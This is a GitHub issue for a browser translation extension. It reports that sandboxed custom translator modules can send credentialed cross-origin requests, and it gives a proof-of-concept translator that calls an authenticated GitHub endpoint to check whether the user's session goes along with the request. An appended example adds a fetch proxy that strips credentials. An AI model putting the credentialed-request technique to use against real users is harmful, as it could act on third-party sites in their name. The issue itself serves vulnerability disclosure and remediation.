Prevent potential XSS attacks for custom translators #492

Open
vitonsky opened this issue Jun 28, 2024 · 0 comments
Labels: custom modules, enhancement (New feature or request), important (Must do it)

vitonsky (Collaborator) commented Jun 28, 2024

The problem

Currently custom translators run in sandboxed iframe, so they have no access to extension API.

However, a custom translator may send requests with credentials included, so it is potentially possible that some code will send a request to a bank's site to send money from one account to another.

POC code:

```js
class TestTranslator {
	// Sends a credentialed cross-origin request to an authenticated GitHub
	// endpoint; if no error comes back, the request carried the user's session.
	translate = async (text, from, to) => {
		var response = await fetch("https://github.com/notifications/indicator", {
			"method": "GET",
			"mode": "cors",
			"credentials": "include",
			"headers": {
				"Accept": "application/json",
			},
		}).then((r) => r.json());

		return JSON.stringify({ isHacked: response.error === undefined, response, request: { text, from, to } }, null, 2);
	};

	translateBatch = (texts, from, to) =>
		Promise.all(texts.map((text) => this.translate(text, from, to)));

	getLengthLimit = () => 4000;
	getRequestsTimeout = () => 300;
	checkLimitExceeding = (text) => {
		const textLength = !Array.isArray(text)
			? text.length
			: text.reduce((len, text) => len + text.length, 0);

		return textLength - this.getLengthLimit();
	};

	static isSupportedAutoFrom = () => true;

	// prettier-ignore
	static getSupportedLanguages = () => [
		"af", "sq", "am", "ar", "hy", "as", "ay", "az", "bm", "eu",
		"be", "bn", "bho", "bs", "bg", "ca", "ceb", "ny", "zh", "zh_HANT",
		"co", "hr", "cs", "da", "dv", "doi", "nl", "en", "eo", "et", "ee",
		"tl", "fi", "fr", "fy", "gl", "ka", "de", "el", "gn", "gu", "ht",
		"ha", "haw", "iw", "hi", "hmn", "hu", "is", "ig", "ilo", "id",
		"ga", "it", "ja", "jw", "kn", "kk", "km", "rw", "gom", "ko",
		"kri", "ku", "ckb", "ky", "lo", "la", "lv", "ln", "lt", "lg",
		"lb", "mk", "mai", "mg", "ms", "ml", "mt", "mi", "mr", "mni-Mtei",
		"lus", "mn", "my", "ne", "no", "or", "om", "ps", "fa", "pl",
		"pt", "pa", "qu", "ro", "ru", "sm", "sa", "gd", "nso", "sr",
		"st", "sn", "sd", "si", "sk", "sl", "so", "es", "su", "sw", "sv",
		"tg", "ta", "tt", "te", "th", "ti", "ts", "tr", "tk", "ak", "uk", "ur",
		"ug", "uz", "vi", "cy", "xh", "yi", "yo", "zu"
	];
}

// The class expression itself is the module's value, as the custom translator loader expects.
TestTranslator;
```

  • Log in to GitHub if you are not already logged in
  • Insert the POC code as a custom translator
  • If you see isHacked true, it means the problem still reproduces

This code sends a request to a GitHub endpoint that requires authentication. If this endpoint does not return an error, it means the code may send requests as the legitimate user.

The solution

To prevent this problem, we should omit credentials in our fetch proxy.

vitonsky added the enhancement, important and custom modules labels on Jun 28, 2024
vitonsky added this to the Next release milestone on Jun 28, 2024
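One way to implement the proposed fix, as an added example that is not part of the issue or the project's code: a fetch proxy wrapper for the sandboxed iframe that discards whatever `credentials` mode the translator asked for and forces `"omit"`, so proxied requests never carry the user's cookies or HTTP auth. The names `sanitizeFetchInit`, `createSandboxFetch` and `demoProxy` are assumptions; the demo replays the init object from the PoC above through a fake fetch so nothing touches the network.

```javascript
// Added example (not the project's code): a credential-stripping fetch proxy.
// Function names are assumptions, not the extension's real API.

// Rebuild the init object without the translator-supplied credentials mode.
// Everything else (method, headers, body, mode, signal, ...) passes through.
function sanitizeFetchInit(init) {
  const { credentials, ...rest } = init || {};
  return { ...rest, credentials: "omit" };
}

// Wrap a fetch implementation. `fetchImpl` defaults to the global fetch; a
// fake is injected in the demo so the example runs offline.
// Setting `credentials` in init also overrides the credentials mode of a
// Request object passed as the first argument, so a translator cannot smuggle
// `credentials: "include"` through `new Request(url, { credentials: "include" })`.
function createSandboxFetch(fetchImpl = globalThis.fetch) {
  return function sandboxFetch(input, init) {
    return fetchImpl(input, sanitizeFetchInit(init));
  };
}

// Demo: send the same init the PoC uses through the proxy and return the
// init that the underlying fetch actually received.
function demoProxy() {
  const calls = [];
  // Fake fetch: records its arguments and answers like an unauthenticated call.
  const fakeFetch = (input, init) => {
    calls.push({ input, init });
    return Promise.resolve({ json: async () => ({ error: "not logged in (fake)" }) });
  };
  const sandboxFetch = createSandboxFetch(fakeFetch);
  // Constructed to match the PoC request above.
  sandboxFetch("https://github.com/notifications/indicator", {
    method: "GET",
    mode: "cors",
    credentials: "include",
    headers: { Accept: "application/json" },
  });
  return calls[0].init;
}

console.log(demoProxy()); // credentials is "omit"; method, mode and headers are unchanged
```

Because the override happens on the extension side of the proxy, a translator has no way to opt back in; if a future use case genuinely needs an authenticated request, that should be an explicit, separately reviewed capability rather than a default.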